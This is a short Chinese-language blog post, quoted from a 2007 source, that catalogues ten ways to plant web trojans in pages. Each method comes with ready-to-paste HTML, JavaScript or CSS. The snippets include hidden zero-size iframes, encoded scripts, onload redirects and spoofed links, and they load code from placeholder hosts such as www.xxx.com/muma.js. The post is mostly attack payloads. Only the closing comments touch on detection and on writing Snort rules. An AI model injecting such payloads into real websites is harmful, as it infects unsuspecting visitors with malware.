Quote: http://anti-hacker.blogspot.com/2007/06/blog-post_22.html
1. 框架掛馬
以下是部份語法:
<iframe src=木馬網址 width=0 height=0></iframe>
2. JScript 文件掛馬
首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處
document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");
最後JScript 掛馬的語法為:
以下是部份語法:
<script language=javascript src=xxx.js></script>
3. JScript 變型加密
以下是部份語法:
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt 可改成任何附檔名
4. body 掛馬
以下是部份語法:
<body onload="window.location='木馬網址';"></body>
5. 隱藏掛馬
以下是部份語法:
top.document.body.innerHTML = top.document.body.innerHTML + ' <iframe src="http://www.xxx.com/muma.htm/"></iframe>';
6. CSS 中掛馬
先將製作好的 muma.js 先利用各種方式上傳至目標處
以下是部份語法:
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
7. JAVA 掛馬
以下是部份語法:
<SCRIPT language=javascript>
window.open ("木馬網址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
8. 圖片偽裝
以下是部份語法:
<html>
<iframe src="網馬網址" height=0 width=0></iframe>
<img src="圖片網址">
</html>
9. 偽裝呼叫
以下是部份語法:
<frameset rows="444,0" cols="*">
<frame src="開啟的網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬網址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
10. 欺騙超連結網址手法
以下是部份語法:
<a href="http://www.XYZ.com(迷惑他人超連結網址,故意顯示這個網址卻連向木馬網址)" onMouseOver="www_163_com(); return true;"> 網頁要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_XYZ_com ()
{
var url="真正連的網頁木馬網址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
留言
改網站目錄權限吧~~~
第3 種最難抓,因為沒法解碼……看到了也不知是啥東西 其他都還好辦,不過像圖嵌語法(還好)還有flash嵌語法的(無解) 以flv的最難解~~~ 對了,你有沒有網頁注入的監視程式啊~
1. 我沒有網頁注入的監視程式 2. 不過我會以 snort 為我的方案,但前提要先研究注入時的封包是什麼,才能來作 snort的 rules ~尚未去研究這個動作的人留^^"